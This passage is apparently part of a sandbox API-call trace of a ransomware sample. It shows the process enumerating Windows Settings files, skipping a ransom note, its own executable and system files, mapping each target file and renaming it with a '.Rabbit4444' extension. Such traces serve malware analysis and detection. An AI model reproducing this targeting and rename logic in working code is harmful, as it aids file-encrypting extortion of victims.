lpString2=".") returned 1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="..") returned 1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="windows") returned -1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="boot") returned -1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.907] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.907] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms" | out: lpString1="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms") returned="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms" [0056.907] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.908] lstrlenW (lpString="AAA_SettingsPageTimeRegionLanguage.settingcontent-ms") returned 52 [0056.908] lstrlenW (lpString="Rabbit4444") returned 10 [0056.908] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.908] lstrlenW (lpString=".dll") returned 4 [0056.908] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.908] lstrlenW (lpString=".lnk") returned 4 [0056.908] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.908] lstrlenW (lpString=".ini") returned 4 [0056.908] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.908] lstrlenW (lpString=".sys") returned 4 [0056.908] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.908] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregionlanguage.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.908] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.908] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14821890772) returned 1 [0056.908] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1097) returned 1 [0056.908] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0056.908] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0056.908] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.912] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.912] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.912] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.913] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.913] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14822370604) returned 1 [0056.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0056.913] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0056.913] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.913] CloseHandle (hObject=0x298) returned 1 [0056.913] CloseHandle (hObject=0x278) returned 1 [0056.913] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms.Rabbit4444") returned 180 [0056.913] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregionlanguage.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionLanguage.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregionlanguage.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.914] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1493ea2e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1493ea2e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x449, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", cAlternateFileName="AA4071~1.SET")) returned 1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2=".") returned 1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="..") returned 1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="windows") returned -1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="boot") returned -1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.914] lstrcmpiW (lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.914] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms" | out: lpString1="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms") returned="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms" [0056.914] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.915] lstrlenW (lpString="AAA_SettingsPageTimeRegionSpelling.settingcontent-ms") returned 52 [0056.915] lstrlenW (lpString="Rabbit4444") returned 10 [0056.915] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.915] lstrlenW (lpString=".dll") returned 4 [0056.915] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.915] lstrlenW (lpString=".lnk") returned 4 [0056.915] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.915] lstrlenW (lpString=".ini") returned 4 [0056.915] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.915] lstrlenW (lpString=".sys") returned 4 [0056.915] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.915] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregionspelling.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.915] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.915] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14822608730) returned 1 [0056.915] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1097) returned 1 [0056.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.915] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0056.916] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0056.917] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0056.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.917] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.918] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14822863209) returned 1 [0056.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.918] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0056.918] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.918] CloseHandle (hObject=0x298) returned 1 [0056.918] CloseHandle (hObject=0x278) returned 1 [0056.918] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms.Rabbit4444") returned 180 [0056.918] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregionspelling.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageTimeRegionSpelling.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagetimeregionspelling.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.919] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x149d73c8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x149d73c8, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23458c07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageWindowsDefender.settingcontent-ms", cAlternateFileName="AA994C~1.SET")) returned 1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2=".") returned 1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="..") returned 1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="windows") returned -1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="boot") returned -1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.919] lstrcmpiW (lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.919] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageWindowsDefender.settingcontent-ms" | out: lpString1="AAA_SettingsPageWindowsDefender.settingcontent-ms") returned="AAA_SettingsPageWindowsDefender.settingcontent-ms" [0056.919] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageWindowsDefender.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.920] lstrlenW (lpString="AAA_SettingsPageWindowsDefender.settingcontent-ms") returned 49 [0056.920] lstrlenW (lpString="Rabbit4444") returned 10 [0056.920] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.920] lstrlenW (lpString=".dll") returned 4 [0056.920] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.920] lstrlenW (lpString=".lnk") returned 4 [0056.920] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.920] lstrlenW (lpString=".ini") returned 4 [0056.920] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.920] lstrlenW (lpString=".sys") returned 4 [0056.920] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.920] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageWindowsDefender.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagewindowsdefender.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.920] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.920] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14823114193) returned 1 [0056.920] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1082) returned 1 [0056.920] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.921] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0056.921] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.921] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.923] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14823377147) returned 1 [0056.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.923] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0056.923] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.923] CloseHandle (hObject=0x298) returned 1 [0056.923] CloseHandle (hObject=0x278) returned 1 [0056.923] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageWindowsDefender.settingcontent-ms.Rabbit4444") returned 177 [0056.923] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageWindowsDefender.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagewindowsdefender.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageWindowsDefender.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspagewindowsdefender.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.924] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a6fd36, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x14a6fd36, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x478, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_Settings_DeveloperModeGroup.settingcontent-ms", cAlternateFileName="AA7CD7~1.SET")) returned 1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2=".") returned 1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="..") returned 1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="windows") returned -1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="boot") returned -1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.924] lstrcmpiW (lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.925] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_Settings_DeveloperModeGroup.settingcontent-ms" | out: lpString1="AAA_Settings_DeveloperModeGroup.settingcontent-ms") returned="AAA_Settings_DeveloperModeGroup.settingcontent-ms" [0056.925] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeveloperModeGroup.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.925] lstrlenW (lpString="AAA_Settings_DeveloperModeGroup.settingcontent-ms") returned 49 [0056.925] lstrlenW (lpString="Rabbit4444") returned 10 [0056.925] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.925] lstrlenW (lpString=".dll") returned 4 [0056.925] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.925] lstrlenW (lpString=".lnk") returned 4 [0056.925] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.925] lstrlenW (lpString=".ini") returned 4 [0056.925] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.925] lstrlenW (lpString=".sys") returned 4 [0056.925] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.925] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeveloperModeGroup.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settings_developermodegroup.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.926] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.926] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14823632097) returned 1 [0056.926] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1144) returned 1 [0056.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.926] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0056.926] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.927] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.927] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.928] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.928] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14823870259) returned 1 [0056.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.928] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0056.928] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.928] CloseHandle (hObject=0x298) returned 1 [0056.928] CloseHandle (hObject=0x278) returned 1 [0056.928] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeveloperModeGroup.settingcontent-ms.Rabbit4444") returned 177 [0056.928] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_Settings_DeveloperModeGroup.settingcontent-ms" (normalized: 